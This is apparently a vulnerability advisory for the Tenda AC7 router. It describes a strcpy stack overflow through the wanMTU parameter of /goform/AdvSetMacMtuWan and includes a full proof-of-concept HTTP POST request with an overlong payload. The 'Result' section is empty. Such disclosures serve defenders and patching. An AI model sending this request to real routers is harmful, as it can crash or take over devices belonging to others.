Vendor
Tenda
Product
AC7 Router
Firmware Version
V15.03.06.44 (and likely earlier versions)
Description
In Tenda AC7 routers with firmware version V15.03.06.44 (and likely earlier versions), the wanMTU parameter of the route /goform/AdvSetMacMtuWan has a stack buffer overflow vulnerability that can lead to remote arbitrary code execution.
The check_param_changed function obtains the user-controlled wanMTU parameter and copies it into a stack buffer using the unsafe strcpy function. Since strcpy does not validate or limit the length of the input data, an attacker can send an overly long wanMTU value to trigger a stack buffer overflow. This vulnerability allows attackers to perform denial-of-service attacks or remotely execute arbitrary code on the affected device.
PoC
POST /goform/AdvSetMacMtuWan HTTP/1.1
Host: 192.168.0.1
Content-Length: 712
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Origin: http://192.168.0.1
Referer: http://192.168.0.1/mac_clone.html?random=0.6216016377171282&
Accept-Encoding: gzip, deflate, br
Cookie: password=pmp1qw
Connection: keep-alive
wanMTU=1AAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wanSpeed=0&cloneType=0&mac=B4:0F:3B:2E:64:19
Result
